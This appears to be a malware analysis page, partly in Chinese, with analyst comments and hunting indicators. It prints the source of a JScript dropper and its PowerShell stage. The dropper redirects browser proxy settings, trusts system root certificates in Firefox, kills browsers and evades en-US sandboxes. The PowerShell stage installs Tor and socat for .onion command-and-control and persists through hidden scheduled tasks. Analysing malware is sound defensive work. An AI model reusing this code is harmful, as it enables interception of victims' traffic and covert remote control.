        // Second pass: reload the file as text and save it again with charset ISO-8859-1.
        // outStreamA's Charset is not set here, so it uses the ADODB default.
        // NOTE(review): the net effect appears to be converting the two-bytes-per-character
        // data written above into a single-byte file — confirm on a test string.
        var outStreamA = new ActiveXObject("ADODB.Stream");
        var outStreamB = new ActiveXObject("ADODB.Stream");
        outStreamA.Type=TEXT_STREAM_TYPE;
        outStreamB.Type=TEXT_STREAM_TYPE;
        outStreamB.Charset = "ISO-8859-1";
        outStreamA.Open();
        outStreamB.Open();
        outStreamA.LoadFromFile(KIp);
        outStreamA.Position = 0; 
        outStreamA.CopyTo(outStreamB);
        outStreamA.Close();
        outStreamB.SaveToFile(KIp,CREATE_OVERWRITE_SAVE_MODE);
        outStreamB.Close();
    },
    // QVn(m, n): both bounds are parsed as base-10 integers; the result lies in [m, n].
    QVn: function(m, n){
        m = parseInt(m,10);
        n = parseInt(n,10);
        return Math.floor(Math.random() * (n - m + 1)) + m;
    },

    // PsdPmHMCVqenzuN(RWTYk, eOUGCiHno): return RWTYk random characters.
    // When eOUGCiHno is false or omitted, the four skipped ranges below remove punctuation,
    // leaving only digits and ASCII letters.
    PsdPmHMCVqenzuN: function(RWTYk, eOUGCiHno){
    // Generate a random file name, used to name the decoded PowerShell scripts
        var xgVtJMwJgIjIpu = 0;
        var weFKCALZLcXDGMD = "";
        var KeAR;
        if (eOUGCiHno === undefined) {
            eOUGCiHno = false;
        }
        while (xgVtJMwJgIjIpu < RWTYk) {
            // Candidate character code in 33..126 (printable ASCII without the space).
            KeAR = (Math.floor((Math.random() * 100)) % 94) + 33;
            if (!eOUGCiHno) {
                if ((KeAR >= 33) && (KeAR <= 47)) {
                    continue;
                }
                if ((KeAR >= 58) && (KeAR <= 64)) {
                    continue;
                }
                if ((KeAR >= 91) && (KeAR <= 96)) {
                    continue;
                }
                if ((KeAR >= 123) && (KeAR <= 126)) {
                    continue;
                }
            }
            xgVtJMwJgIjIpu++;
            weFKCALZLcXDGMD += String.fromCharCode(KeAR);
        }
        return weFKCALZLcXDGMD;
    },
    // nahF(str): trim whitespace at both ends (used on the HTTP responses of the IP lookup).
    nahF: function(str){
        return str.replace(/(^\s+)|(\s+$)/g, "");
    }
};
// Polyfill: String.format("{0} ... {1}", a, b) substitutes positional placeholders.
// A placeholder whose argument is missing is left in the output unchanged.
if (!String.format) {
  String.format = function(format) {
    // Everything after the format string becomes the substitution list.
    var args = Array.prototype.slice.call(arguments, 1);
    return format.replace(/{(\d+)}/g, function(match, number) { 
      return typeof args[number] != "undefined"
        ? args[number] 
        : match
      ;
    });
  };
}
// Stage object for the Windows (WinINet) proxy settings: looks up the public IP, rewrites the
// per-user proxy auto-config values in the registry, and drops/runs one PowerShell payload.
// Analyst note: the two registry values written here and the 127.0.0.1:5555 PAC URL are
// stable indicators even though every file name is random.
function pjWBhLWlAGVeKiN(){
    // PowerShell script path: 8 random alphanumerics + ".ps1" (the %TEMP% prefix is added later)
    this.kZNsJyERrbjMEdZ=SGUUmXppVIOh.PsdPmHMCVqenzuN(8)+".ps1";

    // lNTsAY(): return the host's public IP as reported by api.ipify.org, falling back to
    // icanhazip.com; returns "" when both synchronous requests fail. Errors are swallowed.
    this.lNTsAY=function(){
        var iAoIOlPGFpaBof = new ActiveXObject("MSXML2"+".XML"+"HTTP");
        try{
            iAoIOlPGFpaBof.open("GET","http://api.ipify.org/",false);
            iAoIOlPGFpaBof.send();
            if(iAoIOlPGFpaBof.status==200){
                return SGUUmXppVIOh.nahF(iAoIOlPGFpaBof.responseText);
            }
        }catch(e){}
        try{
            iAoIOlPGFpaBof.open("GET","http://icanhazip.com/",false);
            iAoIOlPGFpaBof.send();
            if(iAoIOlPGFpaBof.status==200){
                return SGUUmXppVIOh.nahF(iAoIOlPGFpaBof.responseText);
            }
        }catch(e){}
        return "";
    };

    // qtPLqwQxQHKKe(): the Base64 literal decodes to
    //   HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
    // which is set to 0 (REG_DWORD). The loop then runs five times; each pass that obtains an
    // IP overwrites AutoConfigURL with a fresh random ".js" name on 127.0.0.1:5555 carrying
    // that IP. Port 5555 on loopback is the socat listener set up by the PowerShell stage
    // shown later on this page, which forwards to a .onion host.
    this.qtPLqwQxQHKKe=function(){
        sZTSiOfmguW.RegWrite(LbXYsoZotGh.nzJryrgLluyiPwC("SEtDV"+"VxTb2Z0d2FyZVxNaWNyb3NvZ"+"nRcV2luZG93c1xDdXJyZW50VmVyc2lvblxJbnRlcm"+"5ldCBTZXR0aW5nc1xBdXRvRGV0ZWN0"),0,"REG_DWORD");

        for(var i=0;i<5;i++){
            var nNxFkACp=this.lNTsAY();
            if(nNxFkACp.length>0){
                this.EdFcz(String.format("http://127.0.0.1:5555/{0}.js?ip={1}",SGUUmXppVIOh.PsdPmHMCVqenzuN(8),nNxFkACp));
            }
        }
    };
    // EdFcz(s): the Base64 literal decodes to
    //   HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
    // and s is written there as REG_SZ.
    this.EdFcz=function(s){
        sZTSiOfmguW.RegWrite(LbXYsoZotGh.nzJryrgLluyiPwC("SEtDVVxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxJbnRlcm5ldCBTZXR0aW5nc1xBdXRvQ29uZmlnVVJM"),s,"REG_SZ");
    };
    // CXaBSojpHZJEm(): decode the payload stored in kVQNRMoBaO.moZgTncSGjjMW, substitute the
    // first %CERT% marker with kVQNRMoBaO.oUXMMFdTE, write it under %TEMP% (iOU) and run it.
    // The command runs hidden (0) and is waited for (true); its output is appended to
    // dEhkFnrZt, i.e. %TEMP%\<COMPUTERNAME>.log.
    // NOTE(review): moZgTncSGjjMW is defined in a part of the listing not reproduced next to
    // this function; its content is not described here.
    this.CXaBSojpHZJEm=function(){
        this.kZNsJyERrbjMEdZ=iOU+"\\"+this.kZNsJyERrbjMEdZ;
        var uIDujligs=LbXYsoZotGh.nzJryrgLluyiPwC(kVQNRMoBaO.moZgTncSGjjMW);
        uIDujligs=uIDujligs.replace("%CERT%",kVQNRMoBaO.oUXMMFdTE);
        SGUUmXppVIOh.Jer(this.kZNsJyERrbjMEdZ,uIDujligs);
        sZTSiOfmguW.Run("cmd /c powershell -ep Unrestricted -f \""+this.kZNsJyERrbjMEdZ+"\" | find /v \"\" >> \""+dEhkFnrZt+"\"",0,true);
    };
    // BUUZMOIyOFXApCU(): delete the dropped script if it still exists.
    this.BUUZMOIyOFXApCU=function(){
        if(VTU.FileExists(this.kZNsJyERrbjMEdZ)){
            VTU.DeleteFile(this.kZNsJyERrbjMEdZ);
        }
    };
}
// Stage object for Firefox: edits prefs.js in the default profile and drops/runs one
// PowerShell payload. Analyst note: the two user_pref lines appended by InstallPac are
// directly checkable in a profile's prefs.js.
function QPxG(){
    // Modify the Firefox profile configuration
    var SFrPOCQQqgWuzbr = DSoEmfpCHxm + "\\Mozilla\\Firefox\\Profiles";
    this.VqJKSQXiygGQzw=SGUUmXppVIOh.PsdPmHMCVqenzuN(8)+".ps1";

    // FPdjKpheWo(): return the path of the first profile folder whose name contains
    // ".default", or false when the Profiles folder is missing or has no such entry.
    this.FPdjKpheWo=function(){
        if(VTU.FolderExists(SFrPOCQQqgWuzbr)){
            var ArrFirefoxProfileList=VTU.GetFolder(SFrPOCQQqgWuzbr).SubFolders;
            if(ArrFirefoxProfileList.Count>0){
                var e = new Enumerator(ArrFirefoxProfileList);
                e.moveFirst();
                while (e.atEnd() == false){
                    var folder=e.item();
                    if(folder.Name.indexOf(".default")>-1){
                        return folder.Path;
                    }
                    e.moveNext();
                }
            }
        }
        return false;
    };
    // InstallPac(): despite the name, no PAC URL is written here. The function rewrites
    // prefs.js ("XHByZWZzLmpz" decodes to "\prefs.js"):
    //   - every line mentioning network.proxy. or security.enterprise_roots.enabled is dropped,
    //   - an existing network.dns.blockDotOnion line has its first "true" turned into "false",
    //   - blockDotOnion=false and enterprise_roots.enabled=true are appended.
    // enterprise_roots.enabled=true makes Firefox trust root certificates from the Windows
    // store. Dropping the proxy prefs presumably returns Firefox to its default proxy mode so
    // that it follows the system setting written by the registry stage — confirm.
    // An existing blockDotOnion line is kept and a second one is appended, so the file can end
    // up with the pref twice.
    this.InstallPac=function(){
        var StrProfile=this.FPdjKpheWo();
        if(StrProfile!=false){
            var StrPrefsJs=StrProfile+LbXYsoZotGh.nzJryrgLluyiPwC("XHByZWZzLmpz");
            if(VTU.FileExists(StrPrefsJs)){
                var StrContent=VTU.OpenTextFile(StrPrefsJs,1).ReadAll();
                var ArrContent=StrContent.split("\n");
                var NewArrContent=[];
                for(var i=0;i<ArrContent.length;i++){
                    if(ArrContent[i].indexOf("network.dns.blockDotOnion")!=-1){
                        ArrContent[i]=ArrContent[i].replace("true","false");
                    }
                    if(ArrContent[i].indexOf("network.proxy.")==-1 && ArrContent[i].indexOf("security.enterprise_roots.enabled")==-1){
                        NewArrContent.push(ArrContent[i]);
                    }

                }
                NewArrContent.push("user_pref(\"network.dns.blockDotOnion\", false);");
                NewArrContent.push("user_pref(\"security.enterprise_roots.enabled\", true);");
                StrContent=NewArrContent.join("\n");
                var stream=VTU.CreateTextFile(StrPrefsJs, true);
                stream.Write(StrContent);
                stream.Close();
            }
        }
    };
    // InstallCert(): same drop-and-run pattern as the other stages, using the payload in
    // kVQNRMoBaO.dDrnVhWm with %CERT% replaced by kVQNRMoBaO.oUXMMFdTE. The script is written
    // under %TEMP% (iOU), run hidden and waited for; output goes to the shared log file.
    this.InstallCert=function(){
        this.VqJKSQXiygGQzw=iOU+"\\"+this.VqJKSQXiygGQzw;
        var uIDujligs=LbXYsoZotGh.nzJryrgLluyiPwC(kVQNRMoBaO.dDrnVhWm);
        uIDujligs=uIDujligs.replace("%CERT%",kVQNRMoBaO.oUXMMFdTE);
        SGUUmXppVIOh.Jer(this.VqJKSQXiygGQzw,uIDujligs);
        sZTSiOfmguW.Run("cmd /c powershell -ep Unrestricted -f \""+this.VqJKSQXiygGQzw+"\" | find /v \"\" >> \""+dEhkFnrZt+"\"",0,true);
    };
    // Close(): delete the dropped script if it still exists.
    this.Close=function(){
        if(VTU.FileExists(this.VqJKSQXiygGQzw)){
            VTU.DeleteFile(this.VqJKSQXiygGQzw);
        }
    };
}
// Stage object that drops and runs the payload stored in kVQNRMoBaO.Ghq. That field begins
// with the Base64 of "$SH_TYPE_SCHEDULED_TASK=1;", i.e. it is the PowerShell script shown
// under the behaviour section of this page (Tor + socat + scheduled tasks).
function C_TP(){
    // Script name: 5 to 10 random alphanumerics + ".ps1".
    this.FileName=SGUUmXppVIOh.PsdPmHMCVqenzuN(SGUUmXppVIOh.QVn(5,10))+".ps1";
    // Install(): pick one of the .onion hosts in kVQNRMoBaO.LgiwpoajBw at random, replace
    // every %DOMAIN% marker in the decoded script with it, write the script under
    // %ALLUSERSPROFILE% and run it hidden, waiting for it to finish.
    this.Install=function(){
        var indexDomain=SGUUmXppVIOh.QVn(0,kVQNRMoBaO.LgiwpoajBw.length-1);
        var Domain=kVQNRMoBaO.LgiwpoajBw[indexDomain];
        this.FileName=sZTSiOfmguW.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")+"\\"+this.FileName;
        var uIDujligs=LbXYsoZotGh.nzJryrgLluyiPwC(kVQNRMoBaO.Ghq);
        uIDujligs=uIDujligs.replace(/%DOMAIN%/g,Domain);
        SGUUmXppVIOh.Jer(this.FileName,uIDujligs);
        sZTSiOfmguW.Run("cmd /c powershell -ep Unrestricted -f \""+this.FileName+"\" | find /v \"\" >> \""+dEhkFnrZt+"\"",0,true);
    };
    // Close(): delete the dropped script if it still exists.
    this.Close=function(){
        if(VTU.FileExists(this.FileName)){
            VTU.DeleteFile(this.FileName);
        }
    };
}
// Orchestrator: runs the stages in a fixed order and removes the dropped scripts afterwards.
function Kvkvfz(){
    // Path of the last script (the logging payload run by sqtf), under %TEMP%.
    this.FileName=iOU+"\\"+SGUUmXppVIOh.PsdPmHMCVqenzuN(8)+".ps1";
    this.lfjxeqjOrhPGUA=function(){
        // Original note: "query IP". What the code does is create the three stage objects
        // and store them in the globals declared at the top of the script.
        CotZ=new pjWBhLWlAGVeKiN();
        PBPRfNXyqx=new QPxG();
        XVEbnkh=new C_TP();
    };
    // Main function. Order of execution:
    //   1. CheckTest()      - stop immediately when it returns true
    //   2. XVEbnkh.Install  - drop and run the Ghq PowerShell payload
    //   3. MXcIDEpEes       - force-close the browsers
    //   4. vhQUbnorFnIqy    - run the moZgTncSGjjMW payload, then write the proxy registry values
    //   5. fDBh             - run the dDrnVhWm payload, then edit Firefox prefs.js
    //   6. Close            - delete the three dropped scripts
    //   7. sqtf             - drop, run and delete the EMAoYeN payload
    this.dKrfMFdadkN=function(){

        if(this.CheckTest()){

            return false;

        }
        this.lfjxeqjOrhPGUA();
        XVEbnkh.Install();
        this.MXcIDEpEes();
        this.vhQUbnorFnIqy();
        this.fDBh();
        this.Close();

        this.sqtf();

    };
    this.vhQUbnorFnIqy=function(){
        CotZ.CXaBSojpHZJEm();
        CotZ.qtPLqwQxQHKKe();
    };
    this.fDBh=function(){
        PBPRfNXyqx.InstallCert();
        PBPRfNXyqx.InstallPac();
    };
    // Original note: "write registry". The three Base64 literals actually decode to
    //   taskkill /F /im iexplore.exe
    //   taskkill /F /im firefox.exe
    //   taskkill /F /im chrome.exe
    // Each is started hidden (0) without waiting (false). Restarted browsers then read the
    // changed proxy and preference settings.
    this.MXcIDEpEes=function(){
        sZTSiOfmguW.Run(LbXYsoZotGh.nzJryrgLluyiPwC("dGFza2tpbGwgL0Y"+"gL2ltIGlleHBsb3JlLmV4ZQ=="),0,false);
        sZTSiOfmguW.Run(LbXYsoZotGh.nzJryrgLluyiPwC("dGFza2tpbGwgL0Yg"+"L2ltIGZpcmVmb3guZXhl"),0,false);
        sZTSiOfmguW.Run(LbXYsoZotGh.nzJryrgLluyiPwC("dGFza2tpbGwgL0YgL"+"2ltIGNocm9tZS5leGU="),0,false);
    };
    // sqtf(): decode kVQNRMoBaO.EMAoYeN, write it to this.FileName, run it hidden and wait,
    // then delete the file. Unlike the other stages its output is not redirected to the log.
    this.sqtf=function(){
        var bData=LbXYsoZotGh.nzJryrgLluyiPwC(kVQNRMoBaO.EMAoYeN);
        SGUUmXppVIOh.Jer(this.FileName,bData);
        sZTSiOfmguW.Run("powershell -ep Unrestricted -f \""+this.FileName+"\"",0,true);
        if(VTU.FileExists(this.FileName)){
            VTU.DeleteFile(this.FileName);
        }
    };
    // Check the operating system language version.
    // Collects MUILanguages from every Win32_OperatingSystem instance and returns true only
    // when the comma-joined list is exactly 'en-US'; the main function aborts in that case.
    // Analyst note: an analysis VM whose only UI language is en-US will therefore show no
    // further behaviour from this script.
    // NOTE(review): the loop variable i is not declared with var and becomes a global.
    this.CheckTest=function(){
        var langs = GetObject("winmgmts:\\\\.\\root\\cimv2").ExecQuery("Select * from Win32_OperatingSystem");
        var arr = [];
        for (var enumItems = new Enumerator(langs) ; !enumItems.atEnd() ; enumItems.moveNext()) {
            var MUILanguages = enumItems.item().MUILanguages.toArray();
            for (i in MUILanguages) {
                arr.push(MUILanguages[i]);
            }
        }
        var muilangs = arr.join(",");
        if(muilangs=='en-US'){
            return true;
        }
        return false;
    }
    // Close(): ask each stage object to delete its dropped script.
    this.Close=function(){
        CotZ.BUUZMOIyOFXApCU();
        PBPRfNXyqx.Close();
        XVEbnkh.Close();
    };   
}
// Script entry point: build the orchestrator and run the whole chain once.
var eGHfyRDGqtYby = new Kvkvfz();
eGHfyRDGqtYby.dKrfMFdadkN();

com调用jscript代码

      1.  调用CoCreateInstance()创建JScript脚本引擎实例,并取得引擎的IActiveScript接口
      2.  实现回调接口IActiveScriptSite,通过IActiveScript->SetScriptSite()交给脚本引擎,供其回调
      3.  通过IActiveScript->QueryInterface()取得IActiveScriptParse接口,该接口用来解析并执行jscript脚本

获得IActiveScript接口

先调用CLSIDFromProgID拿到对应脚本引擎的CLSID(这里是jscript,即下面代码中的guid变量),然后用CoCreateInstance创建一个脚本引擎实例,riid为IID_IActiveScript;
调用成功后得到一个IActiveScript对象指针。



// Decompiler output, reproduced as pasted (one statement is split across two lines and one
// is collapsed to "if…"). Resolves a ProgID to a class ID and creates the script engine,
// asking for the interface identified by riid; the result pointer is stored through `this`.
// Returns the HRESULT of the last COM call made.
HRESULT __thiscall get_jscript_engine(LPVOID this, LPCOLESTR lpszProgID, LPUNKNOWN pUnkOuter, DWORD dwClsContext)
{
LPVOID ppv; // [esp+0h] [ebp-1Ch]
HRESULT v6; // [esp+4h] [ebp-18h]
const IID guid; // [esp+8h] [ebp-14h]

ppv
= this;
// lpszProgID is L"JScript" at the call site shown in run_jscript
v6 = CLSIDFromProgID(lpszProgID, &guid);
// collapsed statement in the decompiler view; its body is not shown in the listing
if…
if ( v6 >= 0 )
// riid = '{BB1A2AE1-A4F9-11cf-8F20-00805F2CD064}', i.e. IID_IActiveScript
v6 = CoCreateInstance(&guid, pUnkOuter, dwClsContext, &riid, ppv);
return v6;
}

run jscript脚本




// Decompiler output; several '*' and '__' tokens appear to have been lost when the listing
// was pasted, so read it as pseudocode rather than compilable C.
// Hosts the JScript engine in-process and runs the decrypted script held in a2:
// create engine -> SetScriptSite -> get the parse interface -> InitNew -> ParseScriptText
// -> SetScriptState. Returns the result of the final SetScriptState call.
// Analyst note: no script file is written and no wscript/cscript process is started on
// this path; the script runs inside the sample's own process through COM.
int thiscall run_jscript(JSEngine this, encry_code a2)
{
int v3; // ST40_4
_DWORD *v4; // ST24_4
int (stdcall **v5)(_DWORD, void , int); // eax
int v6; // eax
int v7; // ST38_4
WCHAR lpWideCharStr; // ST34_4
int v9; // ST30_4
int v10; // ST2C_4

// 0x17 equals CLSCTX_ALL; the IActiveScript pointer lands in this->scriptEngine_
get_jscript_engine(&this->scriptEngine_, L"JScript", 0, 0x17u);
v3 = QueryInterface(&this->scriptEngine_);
// COleScript::SetScriptSite
// offset 0xC is the fourth vtable slot with 4-byte pointers; `this` is passed as the site,
// so the JSEngine object presumably implements IActiveScriptSite — confirm
((v3 + 0xC))(v3, this);
// obtain the parse interface into this->field_C (step 3 of the write-up);
// sub_10C3380 is not shown in the listing
v4 = sub_10C3380(&this->field_C);
v5 = QueryInterface(&this->scriptEngine_);
COleScript::QueryInterface(v5, v4);
v6 = QueryInterface(&this->field_C);
// COleScript::InitNew
((v6 + 0xC))(v6);
v7 = a2->size;
// presumably 2 * (v7 + 1) bytes: room for size + 1 wide characters
lpWideCharStr = operator new[](2 (v7 + 1));
// Convert the JScript source to wide characters (UTF-16).
// Code page 0 is CP_ACP; length -1 means the source is treated as NUL-terminated.
// NOTE(review): the field is called addr here and js_code in the main() listing.
MultiByteToWideChar(0, 0, a2->addr, -1, lpWideCharStr, v7 + 1);
v9 = QueryInterface(&this->field_C);
// COleScript::ParseScriptText
// offset 0x14 is the sixth vtable slot; the 2 sits in the flags position, which
// corresponds to SCRIPTTEXT_ISVISIBLE — confirm against the interface definition
((v9 + 0x14))(v9, v9, lpWideCharStr, &dword_1103518, 0, 0, 0, 0, 2, 0, 0);
v10 = QueryInterface(&this->scriptEngine_);
// COleScript::SetScriptState
// The JScript code is executed inside this call; state 2 is SCRIPTSTATE_CONNECTED
return ((v10 + 20))(v10, 2);
}

脚本行为

脚本会释放出一个powershell脚本;可能是C2连接已经失效,后续的行为没跑出来。

# Selector for the task-registration backend used by xrnOlrj:
#   1 = the ScheduledTasks PowerShell module
#   2 = the Microsoft.Win32.TaskScheduler library loaded by InitScheduller
# The default is 1; IwoPMc later overwrites $schedulerType with InitScheduller's result.
$SH_TYPE_SCHEDULED_TASK=1;
$SH_TYPE_TASK_SCHEDULER=2;
$schedulerType=$SH_TYPE_SCHEDULED_TASK;
# Unzip helper: extract $zipfile into $destination.
# Uses 7za.exe under %ALLUSERSPROFILE%, downloading it from chocolatey.org when it is not
# there yet; a failed download is ignored and the Shell.Application COM object is used instead.
# Analyst note: a 7za.exe appearing directly under %ALLUSERSPROFILE% is an artefact of this
# function and stays on disk (nothing in this function removes it).
function FVRClsggMRAZ
{
param([string]$zipfile, [string]$destination);
$7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
if (-NOT (Test-Path $7z)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
}
Catch{}
}
# x = extract with paths, -o = output folder, -y = answer yes to every prompt
if ($(Try { Test-Path $7z.trim() } Catch { $false })){
Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
# Fallback: copy each archive item through the shell's zip-folder support
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
# Decode the Base64 text in $string and write the resulting bytes to $file.
# No call to this function appears in the part of the script shown on this page.
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
# Return a random string of digits and ASCII letters (codes 48-57, 65-90, 97-122).
# The length is Get-Random between $min and $max, where -Maximum is exclusive, so the
# defaults give 5 to 14 characters. Get-Random -Count picks without replacement, so no
# character repeats within one string.
# Used for task names, task descriptions and dropped file or folder names.
function RandomString{
    param([int]$min=5, [int]$max=15);
    return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
}
# Choose the task-registration backend and return its selector value.
# If the ScheduledTasks module can be imported, return 1. Otherwise download the
# taskscheduler 2.5.23 package from api.nuget.org, unpack it into a random folder under
# %TEMP%, load lib\net20\Microsoft.Win32.TaskScheduler.dll from it and return 2.
function InitScheduller{
    try{
        Import-Module ScheduledTasks -ErrorAction Stop;
        return $SH_TYPE_SCHEDULED_TASK;
    }catch{
        $File=$env:Temp+'\'+(RandomString)+'.zip';
        $Dest=$env:Temp+'\'+(RandomString);
        # Retries with no delay and no limit until the download helper reports success
        while (!(iGgRLcyIJQBzrA 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
        if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
        FVRClsggMRAZ $File $Dest;
        Remove-Item -Force $File;
        # The extracted folder is left in place; only the downloaded archive is deleted
        $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
        $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
        return $SH_TYPE_TASK_SCHEDULER;
    }
}
# Persistence helper: register a scheduled task and start it immediately.
#   $name    task name (the callers shown on this page pass a RandomString)
#   $cmd     program to execute
#   $params  argument string for $cmd
#   $restart 1 adds a second trigger that repeats every minute
#   $delay   delay in seconds applied to the logon trigger
#   $dir     working directory of the action
# Every task gets an at-logon trigger for the current user, is allowed to run on battery
# power, and carries a random description.
# Analyst note: the callers shown on this page use mshta.exe as $cmd with a "vbscript:"
# one-liner as $params, so scheduled tasks with random names whose action is
# mshta.exe vbscript:... are the artefact to look for.
function xrnOlrj
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
switch ($schedulerType) {
    # Backend 1: ScheduledTasks module cmdlets
    $SH_TYPE_SCHEDULED_TASK {
        $Action = New-ScheduledTaskAction -Execute $cmd;
        if(-Not [String]::IsNullOrEmpty($params)){
            $Action.Arguments=$params;
        }
        if(-Not [String]::IsNullOrEmpty($dir)){
            $Action.WorkingDirectory=$dir;
        }
        $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn;
        # Two property names are tried for the user, the second only if the first assignment fails
        try{
            $LogonTrigger.UserId=$env:username;
        }catch{
            $LogonTrigger.User=$env:username;
        }
        # Parsed as (-Not $delay) -eq 0, which is still true only for a non-zero delay
        if(-Not $delay -eq 0){
            $LogonTrigger.Delay=New-TimeSpan -Seconds $delay;
        }
        # Repeat every minute, starting at 12am, for 20 years
        if($restart -eq 1){
            $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20));
        }
        $Settings = New-ScheduledTaskSettingsSet;
        $Settings.DisallowStartIfOnBatteries = $False;
        $Settings.StopIfGoingOnBatteries = $False;
        if($restart -eq 1){
            $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString);
        }else{
            $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString);
        }
        Start-ScheduledTask -InputObject $Task;
    };
    # Backend 2: Microsoft.Win32.TaskScheduler library loaded by InitScheduller
    Default {
        $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
        $td=$ts.NewTask();
        $td.RegistrationInfo.Description = (RandomString);
        $td.Settings.DisallowStartIfOnBatteries = $False;
        $td.Settings.StopIfGoingOnBatteries = $False;
        # A new start request is ignored while an instance is already running
        $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
        $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
        $LogonTrigger.StartBoundary=[System.DateTime]::Now;
        $LogonTrigger.UserId=$env:username;
        $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
        $td.Triggers.Add($LogonTrigger);
        # Repeat every minute with no end of the repetition
        if($restart -eq 1){
        $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
        $TimeTrigger.StartBoundary=[System.DateTime]::Now;
        $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1);
        $TimeTrigger.Repetition.StopAtDurationEnd=$False;
        $td.Triggers.Add($TimeTrigger);
        }
        $tsf="Microsoft.Win32.TaskScheduler";
        $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir);
        $td.Actions.Add($ExecAction);
        $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
        $task.Run();
    };
}
}
# Analyst note: download helper of the decoded sample.
# Fetches the URL in $AETLcnitKnaNqr to the local path in $aEntsBMtsayB and
# returns $true only if the destination path exists afterwards.
# Three transports are tried in order, each one only if the previous one threw:
#   1. Start-BitsTransfer (BITS cmdlet)
#   2. System.Net.WebClient.DownloadFile
#   3. bitsadmin.exe launched through a hidden cmd.exe
# Detection-relevant artefacts visible here: BITS jobs created by PowerShell,
# and a cmd.exe child running "bitsadmin /transfer /download /priority HIGH".
function iGgRLcyIJQBzrA {
    param([string]$AETLcnitKnaNqr, [string]$aEntsBMtsayB);
    # "Stop" turns non-terminating cmdlet errors into exceptions so the catch blocks below run.
    $ErrorActionPreference = "Stop";
    Write-Host ("Download {0} to {1}" -f ($AETLcnitKnaNqr, $aEntsBMtsayB));
    try {
        Start-BitsTransfer -Source $AETLcnitKnaNqr -Destination $aEntsBMtsayB;
    }
    catch {
        #Write-Error $_ -ErrorAction Continue;
        try {
            (New-Object System.Net.WebClient).DownloadFile($AETLcnitKnaNqr,$aEntsBMtsayB);
        }
        catch {
            #Write-Error $_ -ErrorAction Continue;
            # Last resort: the URL and path are interpolated into a cmd.exe command line; the window is hidden.
            Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$AETLcnitKnaNqr`" `"$aEntsBMtsayB`"" -Wait -WindowStyle Hidden;
        }
    }finally{
        # Restore the lenient error mode whichever transport succeeded or failed.
        $ErrorActionPreference = "Continue";
    }
    # Success is judged only by the destination existing; content and size are not checked.
    if ( $(Try { Test-Path $aEntsBMtsayB.trim() } Catch { $false })){
        return $true;
    }
    return $false;
}
# Analyst note: main installer routine of the decoded sample.
# Visible behaviour, in order:
#   - downloads the Tor expert bundle (tor-win32-0.3.1.9.zip) from one of three mirrors into %TEMP%
#   - unpacks it into a randomly named directory under %ALLUSERSPROFILE%
#   - downloads socat-windows 1.7.2.1 from GitHub and unpacks it into the same directory
#   - registers tasks (via xrnOlrj) whose action is mshta.exe with a vbscript: argument
#     that starts tor.exe, two socat relays, and finally a PowerShell downloader
# FVRClsggMRAZ, xrnOlrj, RandomString and InitScheduller are defined outside this function;
# FVRClsggMRAZ presumably extracts a zip archive - confirm against its definition.
# xrnOlrj's argument order is presumably (name, cmd, params, restart, delay, dir), inferred from
# the variables used in the task-registration code above - confirm.
# Hunting pointers taken from this code: scheduled tasks with random names running
# mshta.exe "vbscript:close(CreateObject("WScript.Shell").Run(...))", tor.exe and socat under
# %ALLUSERSPROFILE%\<random>\, loopback listeners on TCP 5555 and 5588, SOCKS traffic to 127.0.0.1:9050.
function IwoPMc{
# The return value is not used again inside this function.
$schedulerType = InitScheduller;
$tf=$env:Temp+'\'+(RandomString)+'.zip';
$DestTP=$env:ALLUSERSPROFILE+'\'+(RandomString);
$TorMirrors=@("https://dist.torproject.org/",
"https://torproject.mirror.metalgamer.eu/dist/",
"https://tor.ybti.net/dist/");
# Try each mirror until the download helper reports success.
foreach ($mirror in $TorMirrors) {
    $_url=$mirror+'torbrowser/7.0.11/tor-win32-0.3.1.9.zip';
    if((iGgRLcyIJQBzrA $_url $tf)){
        break;
    }
}
# Recreate the destination directory from scratch.
if ((Test-Path $DestTP) -eq 1){Remove-Item -Force -Recurse $DestTP;}mkdir $DestTP | Out-Null;
FVRClsggMRAZ $tf $DestTP;
Remove-Item -Force $tf;
$ykF=$DestTP+'\Tor\';
# mshta.exe is used as a proxy launcher: the vbscript: URL runs tor.exe with window style 0 (hidden).
